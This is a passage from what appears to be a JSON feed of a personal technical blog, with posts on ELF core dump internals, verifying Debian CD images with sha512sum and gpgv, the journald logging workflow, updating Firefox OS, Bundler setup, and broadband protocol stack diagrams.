     0x0000000001597be4 0x00007f2491114000 0x0000000000000000\n                 0x0000000000800000 0x0000000000800000  RW     1\n  LOAD           0x0000000001d97be4 0x00007f2491914000 0x0000000000000000\n                 0x0000000000000000 0x00000000001a8000  R E    1\n  LOAD           0x0000000001d97be4 0x00007f2491cbc000 0x0000000000000000\n                 0x000000000000e000 0x000000000000e000  R      1\n  LOAD           0x0000000001da5be4 0x00007f2491cca000 0x0000000000000000\n                 0x0000000000003000 0x0000000000003000  RW     1\n  LOAD           0x0000000001da8be4 0x00007f2491ccd000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  RW     1\n  LOAD           0x0000000001da9be4 0x00007f2491cd1000 0x0000000000000000\n                 0x0000000000008000 0x0000000000008000  R      1\n  LOAD           0x0000000001db1be4 0x00007f2491cd9000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n[...]\n
\n\n

The PT_LOAD entry in the program header describes VMAs of the process:

\n\n
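As a sketch of how these entries can be read programmatically, here is a minimal, hypothetical helper (`count_load_segments` is my name, not an existing API) which counts the PT_LOAD segments of a 64-bit little-endian core image already loaded in memory, using the structures from `<elf.h>`; real code would validate e_ident and bounds-check every access:

```c
#include <elf.h>
#include <stddef.h>

/* Count the PT_LOAD program headers (i.e. the VMAs) of a 64-bit
   little-endian ELF core image.  No validation is done: this is a
   sketch, not a hardened parser. */
size_t count_load_segments(const unsigned char* image) {
    const Elf64_Ehdr* ehdr = (const Elf64_Ehdr*) image;
    size_t count = 0;
    for (Elf64_Half i = 0; i < ehdr->e_phnum; ++i) {
        const Elf64_Phdr* phdr = (const Elf64_Phdr*)
            (image + ehdr->e_phoff + (size_t) i * ehdr->e_phentsize);
        if (phdr->p_type == PT_LOAD)
            ++count;
    }
    return count;
}
```

The same loop, filtering on PT_NOTE instead, locates the notes segment discussed below in the file.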

As these are VMAs, they are aligned on page boundaries.

\n

We can compare that with cat /proc/$pid/maps and we find the same\ninformation:

\n
\n00400000-0049d000 r-xp 00000000 08:11 789936          /usr/bin/xchat\n0069c000-006a0000 rw-p 0009c000 08:11 789936          /usr/bin/xchat\n006a0000-006a4000 rw-p 00000000 00:00 0\n01872000-02746000 rw-p 00000000 00:00 0               [heap]\n7f248c000000-7f248c021000 rw-p 00000000 00:00 0\n7f248c021000-7f2490000000 ---p 00000000 00:00 0\n7f2490885000-7f24908a1000 r--p 00000000 08:11 1442232 /usr/share/icons/gnome/icon-theme.cache\n7f24908a1000-7f24908bd000 r--p 00000000 08:11 1442232 /usr/share/icons/gnome/icon-theme.cache\n7f24908bd000-7f2490eb0000 r--p 00000000 08:11 1313585 /usr/share/fonts/opentype/ipafont-gothic/ipag.ttf\n7f2490eb0000-7f2490eb2000 r-xp 00000000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f2490eb2000-7f24910b1000 ---p 00002000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b1000-7f24910b2000 r--p 00001000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b2000-7f24910b3000 rw-p 00002000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b3000-7f2491113000 rw-s 00000000 00:04 1409039 /SYSV00000000 (deleted)\n7f2491113000-7f2491114000 ---p 00000000 00:00 0\n7f2491114000-7f2491914000 rw-p 00000000 00:00 0      [stack:1957]\n[...]\n
\n\n

The three first PT_LOAD entries of the core dump map to the VMAs of\nthe xchat ELF file:

\n\n

We can compare this to the program headers of the xchat program:

\n
\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001c0 0x00000000000001c0  R E    8\n  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x000000000009c4b4 0x000000000009c4b4  R E    200000\n  LOAD           0x000000000009c4b8 0x000000000069c4b8 0x000000000069c4b8\n                 0x0000000000002bc9 0x0000000000007920  RW     200000\n  DYNAMIC        0x000000000009c4d0 0x000000000069c4d0 0x000000000069c4d0\n                 0x0000000000000360 0x0000000000000360  RW     8\n  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x0000000000086518 0x0000000000486518 0x0000000000486518\n                 0x0000000000002e64 0x0000000000002e64  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame\n   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss\n   04     .dynamic\n   05     .note.ABI-tag .note.gnu.build-id\n   06     .eh_frame_hdr\n   07\n
\n\n

Sections

\n

ELF core dumps are not expected to have section headers. The Linux\nkernel does not generate section headers when it creates core\ndumps. GDB, however, generates section headers with the same information as the\nprogram headers:

\n\n
\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [ 0]                   NULL             0000000000000000  00000000\n       0000000000000000  0000000000000000           0     0     0\n  [ 1] note0             NOTE             0000000000000000  00004b80\n       0000000000009064  0000000000000000   A       0     0     1\n  [ 2] load              NOBITS           0000000000400000  0000dbe4\n       000000000009d000  0000000000000000  AX       0     0     1\n  [ 3] load              PROGBITS         000000000069c000  0000dbe4\n       0000000000004000  0000000000000000  WA       0     0     1\n  [ 4] load              PROGBITS         00000000006a0000  00011be4\n       0000000000004000  0000000000000000  WA       0     0     1\n  [ 5] load              PROGBITS         0000000001872000  00015be4\n       0000000000ed4000  0000000000000000  WA       0     0     1\n  [ 6] load              PROGBITS         00007f248c000000  00ee9be4\n       0000000000021000  0000000000000000  WA       0     0     1\n  [ 7] load              PROGBITS         00007f2490885000  00f0abe4\n       000000000001c000  0000000000000000   A       0     0     1\n  [ 8] load              PROGBITS         00007f24908a1000  00f26be4\n       000000000001c000  0000000000000000   A       0     0     1\n  [ 9] load              PROGBITS         00007f24908bd000  00f42be4\n       00000000005f3000  0000000000000000   A       0     0     1\n  [10] load              NOBITS           00007f2490eb0000  01535be4\n       0000000000002000  0000000000000000  AX       0     0     1\n  [11] load              PROGBITS         00007f24910b1000  01535be4\n       0000000000001000  0000000000000000   A       0     0     1\n  [12] load              PROGBITS         00007f24910b2000  01536be4\n       0000000000001000  0000000000000000  WA       0     0     1\n  [13] load              PROGBITS         00007f24910b3000  
01537be4\n       0000000000060000  0000000000000000  WA       0     0     1\n[...]\n  [345] .shstrtab         STRTAB           0000000000000000  036febe4\n       0000000000000016  0000000000000000           0     0     1\nKey to Flags:\n  W (write), A (alloc), X (execute), M (merge), S (strings), l (large)\n  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)\n  O (extra OS processing required) o (OS specific), p (processor specific\n
\n\n

Notes

\n

The PT_NOTE program header contains additional information such as\nthe registers of the threads, the files associated with each VMA, etc.\nIt is made of note entries (ElfW(Nhdr) structures):

\n\n
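Walking these entries is straightforward: each one is a fixed-size note header followed by the owner name and the descriptor, both padded to 4-byte boundaries. A minimal sketch (`count_notes` and `align4` are hypothetical helper names) for a 64-bit note segment already loaded in memory:

```c
#include <elf.h>
#include <stddef.h>

/* 4-byte alignment applied between the fields of a note entry. */
static size_t align4(size_t x) { return (x + 3) & ~(size_t) 3; }

/* Count the note entries of a PT_NOTE segment: each entry is an
   Elf64_Nhdr followed by the padded owner name and descriptor. */
size_t count_notes(const unsigned char* note, size_t size) {
    size_t offset = 0, count = 0;
    while (offset + sizeof(Elf64_Nhdr) <= size) {
        const Elf64_Nhdr* nhdr = (const Elf64_Nhdr*) (note + offset);
        offset += sizeof(Elf64_Nhdr)
                + align4(nhdr->n_namesz) + align4(nhdr->n_descsz);
        ++count;
    }
    return count;
}
```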

Here is the content of the notes:

\n
Displaying notes found at file offset 0x00004b80 with length 0x00009064:\n  Owner                 Data size       Description\n  CORE                 0x00000088       NT_PRPSINFO (prpsinfo structure)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000130       NT_AUXV (auxiliary vector)\n  CORE                 0x00006cee       NT_FILE (mapped files)\n
\n\n

Most data structures (prpsinfo, prstatus, etc.) are defined in C\nheader files (such as linux/elfcore.h).

\n

Generic process information

\n

The CORE/NT_PRPSINFO entry defines generic process information such\nas the process state, UID, GID, filename and (part of) its arguments.

\n

The CORE/NT_AUXV entry describes the auxiliary vector.

\n

Thread information

\n

Each thread has the following entries:

\n\n

For multithreaded processes there are two approaches:

\n\n

See the wording of LLDB source\ncode:

\n
\n

If a core file contains multiple thread contexts then there is two data forms

\n
    \n
  1. \n

    Each thread context(2 or more NOTE entries) contained in its own segment (PT_NOTE)

    \n
  2. \n
  3. \n

    All thread context is stored in a single segment(PT_NOTE).\n This case is little tricker since while parsing we have to find where the\n new thread starts. The current implementation marks beginning of\n new thread when it finds NT_PRSTATUS or NT_PRPSINFO NOTE entry.

    \n
  4. \n
\n
\n

File association

\n

The CORE/NT_FILE entry describes the association between VMAs and\nfiles. Each non-anonymous VMA has an entry with:

\n\n
\n    Page size: 1\n                 Start                 End         Page Offset\n    0x0000000000400000  0x000000000049d000  0x0000000000000000\n        /usr/bin/xchat\n    0x000000000069c000  0x00000000006a0000  0x000000000009c000\n        /usr/bin/xchat\n    0x00007f2490885000  0x00007f24908a1000  0x0000000000000000\n        /usr/share/icons/gnome/icon-theme.cache\n    0x00007f24908a1000  0x00007f24908bd000  0x0000000000000000\n        /usr/share/icons/gnome/icon-theme.cache\n    0x00007f24908bd000  0x00007f2490eb0000  0x0000000000000000\n        /usr/share/fonts/opentype/ipafont-gothic/ipag.ttf\n    0x00007f2490eb0000  0x00007f2490eb2000  0x0000000000000000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f2490eb2000  0x00007f24910b1000  0x0000000000002000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b1000  0x00007f24910b2000  0x0000000000001000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b2000  0x00007f24910b3000  0x0000000000002000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b3000  0x00007f2491113000  0x0000000000000000\n        /SYSV00000000 (deleted)\n    0x00007f2491914000  0x00007f2491abc000  0x0000000000000000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491abc000  0x00007f2491cbc000  0x00000000001a8000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cbc000  0x00007f2491cca000  0x00000000001a8000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cca000  0x00007f2491ccd000  0x00000000001b6000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cd1000  0x00007f2491cd9000  0x0000000000000000\n        /usr/share/icons/hicolor/icon-theme.cache\n    0x00007f2491cd9000  0x00007f2491cf5000  0x0000000000000000\n        /usr/share/icons/oxygen/icon-theme.cache\n    0x00007f2491cf5000  0x00007f2491d11000  0x0000000000000000\n        /usr/share/icons/oxygen/icon-theme.cache\n    0x00007f2491d11000  0x00007f2491d1d000 
 0x0000000000000000\n        /usr/lib/xchat/plugins/tcl.so\n[...]\n
\n\n

As far as I understand (from the binutils readelf source code)\nthe format of the CORE/NT_FILE entry is:

\n
    \n
  1. number of map entries (32 or 64 bits);
  2. \n
  3. page size (set to 1 by GDB instead of the real page size, 32 or 64 bits);
  4. \n
  5. each map entry with the format:
      \n
    1. start
    2. \n
    3. end;
    4. \n
    5. file offset
    6. \n
    \n
  6. \n
  7. each (null terminated) path string in order.
  8. \n
\n
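The layout above can be made concrete by hand-building a tiny 64-bit NT_FILE payload and dumping its words. This is an illustrative sketch only: the entry count, page size, addresses and path are all made up.

```shell
# Sketch of the NT_FILE layout described above (64-bit words,
# little-endian); all values and the path are made up.
printf '\001\000\000\000\000\000\000\000' >  ntfile.bin  # 1. entry count = 1
printf '\001\000\000\000\000\000\000\000' >> ntfile.bin  # 2. page size = 1 (GDB-style)
printf '\000\000\100\000\000\000\000\000' >> ntfile.bin  # start = 0x400000
printf '\000\000\120\000\000\000\000\000' >> ntfile.bin  # end   = 0x500000
printf '\000\000\000\000\000\000\000\000' >> ntfile.bin  # file offset = 0
printf '/usr/bin/true\000' >> ntfile.bin                 # NUL-terminated path string
# Dump the five 8-byte words of the header and entry:
od -A d -t x8 -N 40 ntfile.bin
```

The two words of the first map entry should show up as 0x400000 and 0x500000 in the od output, followed by the path bytes.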

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/05/10/verify-a-debian-cd/", "title": "Verifying authenticity of Debian CDs", "url": "https://www.gabriel.urdhr.fr/2015/05/10/verify-a-debian-cd/", "date_published": "2015-05-10T00:00:00+02:00", "date_modified": "2015-05-10T00:00:00+02:00", "tags": ["computer", "debian"], "content_html": "

The official guide for verifying\nthe authenticity of a Debian \"\ud83c\udf65\" CD image is not so clear if you don't\nalready have an idea about what you're doing. Here is a translation into\nshell commands.

\n

You need to download:

\n\n

Then you need to:

\n
cat SHA512SUMS | grep debian-8.0.0-amd64-xfce-CD-1.iso | sha512sum -c - # (1)\nsudo apt-get install debian-keyring  # (2)\ngpgv --keyring /usr/share/keyrings/debian-role-keys.gpg -vv -- \\\n  SHA512SUMS.sign SHA512SUMS # (3)\n
\n\n\n

and check that no error is reported.

\n

Details:

\n
    \n
  1. \n

    This checks that the downloaded file matches the digest\nindicated in the SHA512SUMS file:

    \n

    $ cat SHA512SUMS | grep debian-8.0.0-amd64-xfce-CD-1.iso | sha512sum -c -\ndebian-8.0.0-amd64-xfce-CD-1.iso: OK\n
    \n

    You should not use MD5SUMS because MD5 is broken, and you should\navoid SHA1SUMS as well.

    \n

    Warning: This is not enough to conclude that the CD image\nis the correct one because an attacker could have uploaded a\nmalicious CD image and a corresponding digest file: we need to\ncheck that the SHA512SUMS has been issued by Debian.

    \n
  2. \n
  3. \n

    We first need to get the GPG public keys of Debian.

    \n
  4. \n
  5. \n

    Then we need to verify the signature of the SHA512SUMS file:

    \n

    \n$ gpgv --keyring /usr/share/keyrings/debian-role-keys.gpg -vv -- \\\n  SHA512SUMS.sign SHA512SUMS\ngpgv: armor: BEGIN PGP SIGNATURE\ngpgv: armor header: Version: GnuPG v1.4.12 (GNU/Linux)\n:signature packet: algo 1, keyid DA87E80D6294BE9B\n        version 4, created 1430005434, md5len 0, sigclass 0x00\n        digest algo 8, begin of digest 87 47\n        hashed subpkt 2 len 4 (sig created 2015-04-25)\n        subpkt 16 len 8 (issuer key ID DA87E80D6294BE9B)\n        data: [4095 bits]\ngpgv: Signature made Sun Apr 26 01:43:54 2015 CEST using RSA key ID 6294BE9B\ngpgv: Good signature from \"Debian CD signing key debian-cd@lists.debian.org\"\ngpgv: binary signature, digest algorithm SHA256\n
    \n

    You might want to check that the digest algorithm is not a broken\nhash function (not MD5, not SHA-1) but something such as SHA-256\nor SHA-512. You might want to check the identity of the signer\n(Debian CD signing key <debian-cd@lists.debian.org>) as well.

    \n
  6. \n
\n

Warning: Both steps (verifying the digest, verifying the\nsignature of the digest file) are necessary in order to ensure that\nthe file is an authentic Debian CD image.

\n

In Fedora, the Debian keyring is shipped in the\ndebian-keyring\npackage.

"}, {"id": "http://www.gabriel.urdhr.fr/2015/04/29/journald-workflow/", "title": "Logging message workflow with journald", "url": "https://www.gabriel.urdhr.fr/2015/04/29/journald-workflow/", "date_published": "2015-04-29T00:00:00+02:00", "date_modified": "2015-04-29T00:00:00+02:00", "tags": ["computer", "system", "log", "syslog", "systemd", "journald"], "content_html": "

A short summary of the logging message workflow with\nsystemd-journald\n(and the different formats and sockets involved).

\n

Summary

\n
\n       /run/systemd/journal/dev-log\n       a.k.a. /dev/log (syslog format)\n      .--------------->------------------.\n      |                                  |\n      |                                  |\n      |      /run/systemd/journal/socket v\n.-----------.(native format)            .----------.  .--------------------.\n| processes |---------------------------| journald |->| /var/log/journal/* |\n'-----------'                           '----------'  '--------------------'\n      |  /run/systemd/journal/stdout    ^ ^  |^ |\n      |  (stream format)                | |  || |/run/systemd/journal/syslog\n      '--------------->-----------------' |  || |(syslog format)\n                                          |  || |\n .--------.  /dev/kmsg (kmsg format)      |  || |  .---------.  .------------.\n | kernel |-------------------------------'  || '->| rsyslog |->| /var/log/* |\n '--------'                                  ||    '---------'  '------------'\n                             (Journal Export ||       | ^\n                             Format)         v|       v |(syslog format)\n                               .-----------------.  .----------------------.\n                               | Remote journald |  | Remote syslog daemon |\n                               '-----------------'  '----------------------'\n
\n\n

Inputs

\n

Kernel messages

\n

/dev/kmsg is a device used to receive logging messages from the\nLinux\nkernel\nusing a specific (kmsg) format.

\n

Syslog format input

\n

/run/systemd/journal/dev-log is a SOCK_DGRAM socket which can be\nused by processes to send syslog-compatible messages to journald.\n/dev/log is a symlink to it, which means that all processes trying to\nuse the system syslog will in fact send their messages to journald.

\n

It is used:

\n\n
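Messages on this socket use the classic syslog line format: a numeric PRI prefix (facility × 8 + severity) followed by a tag and the message text. A quick sketch of how the prefix is computed (the tag and text are made up):

```shell
# Syslog PRI computation: PRI = facility * 8 + severity.
# facility user = 1, severity debug = 7, so PRI = 15.
facility=1
severity=7
printf '<%d>demo: hello\n' $((facility * 8 + severity))
```

Such a message could then be sent as a datagram to /dev/log, for instance with `socat - UNIX-SENDTO:/dev/log`.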

Stream format input

\n

/run/systemd/journal/stdout is a SOCK_STREAM socket which can be used by\nprocesses to send logging messages in the simple \u201cstream\u201d format (one\nline per message with an optional severity prefix).

\n

Usage:

\n\n

Just after opening the stream, sd_journal_stream_fd() sends the\nfollowing information:

\n
    \n
  1. \n

    the self-proclaimed name of the program (optional);

    \n
  2. \n
  3. \n

    unit name (optional);

    \n
  4. \n
  5. \n

    default severity (when no prefix severity is used);

    \n
  6. \n
  7. \n

    whether to parse severity prefixes in the messages;

    \n
  8. \n
  9. \n

    whether to forward messages to /run/systemd/journal/syslog (0 or\n1);

    \n
  10. \n
\n

This happens as well if ForwardToSyslog=true in the systemd\n configuration (enabled by default).

\n
    \n
  1. whether to forward messages to /dev/kmsg (0 or 1);
  2. \n
\n

This happens as well if ForwardToKMsg=true in the systemd\n configuration (disabled by default); the maximum forwarded level is\n set with the MaxLevelKMsg option.

\n
    \n
  1. whether to forward messages to console (0 or 1).
  2. \n
\n

This happens as well if ForwardToConsole=true in the systemd\n configuration (disabled by default).

\n

Each line after this prolog is a logging message optionally prefixed\nwith a severity.

\n

Example:

\n
foo\nfoo.service\n5\n1\n0\n0\n0\n<7>Debug 1\n<7>Debug 2\n
\n\n\n

We can create log entries with:

\n
echo \"foo\nfoo.service\n5\n1\n0\n0\n0\n<7>Debug 1\n<7>Debug 2\" | socat STDIN UNIX-CONNECT:/run/systemd/journal/stdout\n
\n\n\n

Native format input

\n

/run/systemd/journal/socket is a SOCK_DGRAM socket used to send\nlogging data to journald using the native format. AFAIK, this is the\nsame format as Journal Export\nFormat but\nwith one logging message per datagram:

\n
PRIORITY=7\nMESSAGE=First (debug) message\nSYSLOG_IDENTIFIER=foo\n
\n\n\n

We can create a message with:

\n
echo \"PRIORITY=7\nMESSAGE=Debug 1\nSYSLOG_IDENTIFIER=foo\nFOO=bar\n\" | socat STDIN UNIX-SENDTO:/run/systemd/journal/socket\n
\n\n\n

It is used by the C\nAPI:\nsd_journal_print, sd_journal_send, etc.

\n

Output

\n

Journal files

\n

If the /var/log/journal directory exists and has the proper\npermissions, journald will use it to store the logging information in\na binary\nformat.

\n

Syslog output

\n

/run/systemd/journal/syslog is a SOCK_DGRAM socket used to send\nthe messages to a syslog daemon (rsyslog).

"}, {"id": "http://www.gabriel.urdhr.fr/2015/03/29/update-firefox-os/", "title": "Updating Firefox OS", "url": "https://www.gabriel.urdhr.fr/2015/03/29/update-firefox-os/", "date_published": "2015-03-29T00:00:00+01:00", "date_modified": "2015-03-29T00:00:00+01:00", "tags": ["computer", "mozilla", "firefox-os"], "content_html": "

I updated a Geeksphone Peak from\nFirefox OS 1.1 to Firefox OS\n2.1 and it was not that easy.

\n

The process is\nexplained\non the Mozilla developer website:

\n
    \n
  1. \n

    first backup everything (AFAIK, this is mostly useful if you want\n to restore your original OS);

    \n
  2. \n
  3. \n

    flash the device with the suitable\n image.

    \n
  4. \n
\n

Issue

\n

What was not so clear (and I found this out after flashing the device)\nis that if you try to restore your /data partition in order to get\nyour data back, it won't work very well \"\ud83d\ude1e\".\nYou obtain a weird/broken mix between the original version of the OS\nand the new one:

\n\n

I get the same kind of behaviour when updating to either v1.4, v2.1,\nv2.2 beta.

\n

If you restore the original version of the OS, you get your data back\n(so the backup is not completely useless).

\n

Partial solution

\n

At this point it seems that restoring the /data partition on the new\nversion of the OS is quite pointless. So this is what I did:

\n\n

Update 2015-04-28: with the updated OS, the phone was having a\nlot of graphic glitches (for example, some parts of the windows would\nnot render at all) and crashes. I managed to fix this by unchecking\nmost of the options in the Developer menu. I don't know\nwhich options were responsible for the bugs. Currently, the only\nenabled options are:

\n\n

Conclusion

\n

I'm not sure if doing all of this was necessary because v1.1 was a very old\nversion or if this will be necessary for a future update.

\n

Now the geolocation works. \"\ud83d\ude04\"

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/03/02/bundler-starter-kit/", "title": "Bundler Starter Kit", "url": "https://www.gabriel.urdhr.fr/2015/03/02/bundler-starter-kit/", "date_published": "2015-03-02T00:00:00+01:00", "date_modified": "2015-03-02T00:00:00+01:00", "tags": ["computer", "ruby"], "content_html": "

Bundler is a tool to manage Ruby gem\ndependencies, install them and set up the execution environment. The\nhomepage shows how to use it to install the gems systemwide, alongside\nthe Ruby installation, which is not so great. For some reason, I\ninitially didn't find the option to install the gems locally\n(--path) and have been using horrible environment variable\nmodifications to avoid the systemwide installation. In fact, this is\nquite simple\u2026

\n

Bundler

\n
which bundle || sudo apt-get install bundler\nmkdir foo/\ncd foo/\n\ncat <<EOF > Gemfile\nsource 'https://rubygems.org'\ngem \"kramdown\"\nEOF\n\nbundle install --path vendor/bundle --binstubs\necho '#Hello' | ./bin/kramdown\necho '#Hello' | middleman exec kramdown\n
\n\n\n

Explanations:

\n\n

git

\n
git init .\n\ncat <<EOF >> .gitignore\nbin\nvendor\n.bundle\nEOF\n\ngit add Gemfile Gemfile.lock .gitignore \ngit commit -m\"First commit\"\n
\n\n\n

Issues

\n

Provide path for dependencies for native extensions:

\n
bundle config build.nokogiri\\\n  \"--use-system-libraries --with-xml2-include=/usr/local\"\n
\n\n\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/02/15/broadband-protocol-stack/", "title": "The broadband protocol stacks", "url": "https://www.gabriel.urdhr.fr/2015/02/15/broadband-protocol-stack/", "date_published": "2015-02-15T00:00:00+01:00", "date_modified": "2015-02-15T00:00:00+01:00", "tags": ["computer", "network", "broadband", "dsl"], "content_html": "

The Broadband Forum has a lot of technical\nreports about\nthe xDSL architecture but it's not so easy to find a good description\nof the global architecture. These are ASCII-art protocol stacks I\ninferred from those documents. What's in there may be wrong, feel free\nto correct me.

\n

You can find relevant diagrams in\nTR-025\n(figure 4,\nfor end-to-end ATM network;\nfigure 5\nfor L2TP;\nfigure 6\nfor PPP termination at the access node),\nin TR-101\n(figure 4\nfor the U interface;\nfigure 7\nfor the V interface),\nTR-059\n(figure 11).

\n

Classic POTS access with PPP

\n
\n
\n[IP  ]<------------------------------->[IP ]\n[PPP ]<------------------------------->[PPP]\n[    ]<->[  |V.90]<------>[V.90|   ]<->[   ]\nClient     Modem            Modem       RAS\n
\n
\n\n

The link between the client and the RAS is a point-to-point link. The\nPPP\nlink-layer protocol is used. It provides:

\n\n

Basic example: PPPoA

\n
\n
\n                 PPPoE                    PPPoA                  L2TP\n             <-------------> <------------------------------> <---------->\n\n[IP ]<->[IP       ]<------------------------------------------------->[IP  ]\n            [PPP  ]<---------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<->[PPPoE|PPPoA  ]<-------------->[PPPoA  |L2TP]<->[L2TP]\n                            [RFC2684]<-------------->[RFC2684|UDP ]<->[UDP ]\n                            [AAL5   ]<-------------->[AAL5   |IP  ]<->[IP  ]\n[Eth]<->[Eth|Eth  ]<->[Eth  |ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U            V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM       LAC/BRAS     \u2026   LNS\n
\nPPPoE to PPPoA to L2TP\n
\n\n

Explanations:

\n\n

On new deployments, it is recommended to use\n Ethernet instead of ATM for the\n aggregation.

\n\n

Variations

\n\n

Modem-router

\n

The modem and the router are often merged in a modem-router:

\n
\n
\n                        PPPoA                   L2TP\n            <-------------------------------><---------->\n\n[IP ]<->[IP         ]<------------------------------->[IP  ]\n            [PPP    ]<---------------(PPP         )-->[PPP ]\n            [PPPoA  ]<-------------->[PPPoA  |L2TP]<->[L2TP]\n            [RFC2684]<-------------->[RFC2684|UDP ]<->[UDP ]\n            [AAL5   ]<-------------->[AAL5   |IP  ]<->[IP  ]\n[Eth]<->[Eth|ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 [    ]\n[PHY]<->[PHY|xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      T               U            V               A10\n        Modem-Router    AN/DSLAM       LAC/BRAS    \u2026   LNS\n
\nModem-router\n
\n\n

PPPoEoA

\n

Instead of converting between PPPoE to PPPoA, the modem can\nencapsulate PPPoE over ATM (PPPoEoA). The modem can be seen as an\nEthernet bridge. This solution is often called PPPoE because ATM was\npreviously always used for aggregation.

\n
\n
\n                               PPPoE                             L2TP\n             <----------------------------------------------> <---------->\n\n[IP ]<->[IP       ]<------------------------------------------------->[IP  ]\n            [PPP  ]<---------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<-------------------------------->[PPPoE  |L2TP]<->[L2TP]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<-------------->[Eth    |UDP ] \u2026 [UDP ]\n                      [     |AAL5   ]<-------------->[AAL5   |IP  ] \u2026 [IP  ]\n                      [     |ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 |    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U            V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM       LAC/BRAS    \u2026  LNS\n
\nPPPoE to PPPoEoA to L2TP\n
\n\n

Ethernet aggregation

\n

In this example, the aggregation network is Ethernet based. This is\nrecommended for new deployments. PPPoE (without ATM) is used instead\nof PPPoA. As before, the modem can be seen as an Ethernet switch.

\n
\n
\n                             PPPoE                                L2TP\n             <-----------------------------------------------> <---------->\n\n[IP ]<->[IP       ]<-------------------------------------------------->[IP  ]\n            [PPP  ]<----------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<--------------------------------->[PPPoE  |L2TP]<->[L2TP]\n                                                      [       |UDP ]<->[UDP ]\n                                             [QinQ]<->[QinQ   |IP  ]<->[IP  ]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<->[Eth      ]<->[Eth    |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY ]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U             V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM        LAC/BRAS    \u2026  LNS\n
\nPPPoE to L2TP\n
\n\n

IPoE

\n

Ethernet aggregation (no ATM) without PPP.

\n
\n
\n[IP ]<->[IP       ]<--------------------------------->[IP        ]<->[IP  ]\n                                             [QinQ]<->[QinQ |    ] \u2026 [    ]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<->[Eth      ]<->[Eth  |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY ]<->[PHY  |    ] \u2026 [    ]\n      S             T                 U             V             A10\n         Router        B-NT              AN             BNG        \u2026  \n                       (xDSL modem)      (DSLAM)\n
\nIPoE\n
\n\n

Interfaces

\n

